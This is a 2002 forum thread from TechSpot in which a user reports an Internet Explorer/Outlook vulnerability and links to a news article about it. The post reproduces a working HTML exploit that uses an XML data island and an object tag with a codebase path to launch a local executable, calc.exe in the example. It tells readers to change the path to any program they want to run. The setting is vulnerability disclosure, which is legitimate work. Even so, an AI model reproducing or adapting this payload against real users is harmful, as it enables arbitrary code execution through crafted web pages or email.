also @ TechSpot: UK's SOCA seizes domain of popular music blog, rnbxclusive.com
Welcome to the TechSpot OpenBoards. Please read the FAQ if you have any questions. Sign up or Login to participate.

Go Back   TechSpot OpenBoards > TechSpot Community > General Discussion

Collaborate in the cloud with Office, Exchange, SharePoint, and Lync

Another IE/Outlook Hole

Thread Tools Search this Thread
  #1  
Old 03-06-2002
lokem's Avatar
TechSpot Addict
 
Location: Assembled In Malaysia
Member since: Mar 2002, 773 posts
Another IE/Outlook Hole

The Register has just posted that IE/Outlook can run arbitrary commands with a simple bit of HTML.

Read the rest here:

http://www.theregister.co.uk/content/4/24274.html

The article also has a simple fix for this problem.

Here's the simple script:

<span datasrc="#oExec" datafld="exploit" dataformatas="html"></span>
<xml id="oExec">
<security>
<exploit>
<![CDATA[
<object id="oFile" classid="clsid:11111111-1111-1111-1111-111111111111" codebase="c:/windows/system32/calc.exe"></object>
]]>
</exploit>
</security>
</xml>


Change c:/windows/system32/calc.exe to the appropriate directory and filename you want to run. I've tested this myself, and it's REALLY scary.
Closed Thread

Similar Topics
Topic Replies Forum
Fan hole for steel case 12 Overclocking, Cooling and Modding
black hole ?? 1 Audio and Video
Black Hole! 3 Device Drivers
Windows XP SP2 has serious security hole 17 General Discussion
New Explorer hole could be devastating 7 General Discussion

Thread Tools Search this Thread
Search this Thread:

Advanced Search
All times are GMT -4. The time now is 12:09 AM.